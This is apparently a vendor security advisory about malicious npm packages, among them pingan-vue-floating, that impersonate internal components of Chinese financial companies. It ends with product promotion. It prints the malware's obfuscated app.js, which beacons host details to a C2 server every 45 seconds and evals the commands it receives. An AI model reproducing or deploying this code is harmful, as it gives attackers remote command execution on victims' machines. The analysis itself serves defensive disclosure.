brief description
On August 9, 2023, Murphy monitored that the ws-paso-jssdk component package posted to the NPM warehouse by a user named snugglejack_org (mail address: [email protected]) had a mail address to https://ql.rustdesk [.]net suspicious traffic, it has been confirmed that the component package carries remote control scripts, receives and executes system commands from the attacker-controlled C2 server, and the component package was downloaded from the NPM warehouse at 7:21 on August 10, 2023 shelf.
After continuous tracking, it was found that the poisoner continued to publish similar malicious component packages such as pingan-vue-floating to the NPM warehouse, and the malicious C2 address of the poisoning package was changed to 62.234.32.226. This IP was provided by Tencent Cloud in Beijing, and The poisoning package is named after pingan, ynf, etc., and it is very likely that it is aimed at domestic manufacturers (such as China *An). The poisoner confuses the name of the private source component inside the target company by simulating it, and then induces the internal users of the user company to download the poisoning component. This is the first publicly discovered open source component poisoning attack on a domestic financial company.
As of August 14, 2023, the poisoning package can still be downloaded from the NPM Tencent source (see Figure 1). Users can judge whether malicious components have been downloaded through npm ls. For batch detection of poisoning detection, contact Murphy to use the product tool safely A one-click investigation of the entire network is being carried out. Recently, a large-scale offensive and defensive drill is in progress. It is recommended that everyone carefully investigate.
Figure 1: Tencent Cloud NPM component download address
Poison analysis
Take the pingan-vue-floating-0.0.7 component as an example. This component package creates a daemon thread through pm2, and sends a request to the malicious C2 server controlled by the attacker every 45 seconds to maintain the heartbeat, and then receives and executes the message sent by the attacker. System command:
//pingan-vue-floating-0.0.7/app.js
const key = (37532).toString(36).toLowerCase()+(27).toString(36).toLowerCase().split('').map(function(S){return String.fromCharCode(S.charCodeAt()+(-39))}).join('')+(1166).toString(36).toLowerCase()+(function(){var v=Array.prototype.slice.call(arguments),A=v.shift();return v.reverse().map(function(N,Q){return String.fromCharCode(N-A-10-Q)}).join('')})(43,107,106,169,150,111,106)+(914).toString(36).toLowerCase()+(function(){var k=Array.prototype.slice.call(arguments),D=k.shift();return k.reverse().map(function(r,I){return String.fromCharCode(r-D-8-I)}).join('')})(36,167,112)
const url = "http://62.234.32.226:8888"
const filename = path.join(os.tmpdir(), 'node_logs.txt');
const headersCnf = {
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134'
}
};
……
function heartbeat(){
const requestData = {
hostname: os.hostname(),
uuid:machineIdSync({original: true}),
os:os.platform(),
};
sendRequest(url+'/api/index',aesEncrypt(JSON.stringify(requestData)))
const task = {
uuid:machineIdSync({original: true}),
}
sendRequest(url+'/api/captcha',aesEncrypt(JSON.stringify(task))).then(result => {
try{
if (result !== undefined) {
const data = JSON.parse(result);
const decodedData = Buffer.from(data.code, 'base64').toString();
eval(decodedData)
}
}catch (error){
}
});
}
function app(){
const result = checkFile();
if (result.exists) {
return
} else {
createTmpFile();
setInterval(heartbeat, 45000);
}
}
app()List of all components poisoned by the attacker in this incident
Tip: Please do your own investigation!
Troubleshooting tools and poisoning intelligence
1. Murphy Security provides products that can block poisoning targeting open source components in real time
Murphy Security's private source gateway product can detect and intercept poisoning events in central warehouses such as npm, pip, and maven in real time, and supports baseline management of high-risk vulnerabilities. Dozens of customers such as China Mobile have landed applications.
2. Murphy Security provides real-time open source component poisoning intelligence warnings, which can be subscribed
Murphy Security 0day vulnerability and poisoning information covers the latest 0day, 1day and poisoning intelligence warnings. All information has been strictly researched and judged by security experts to ensure that enterprises can obtain first-hand high-quality vulnerability and poisoning intelligence, which is more than CVE There are more than 25 additional detailed analysis fields in the vulnerability library. At present, this product has been applied in dozens of customers such as Ant, Meituan, and China Telecom.
Apply for demo & trial channel: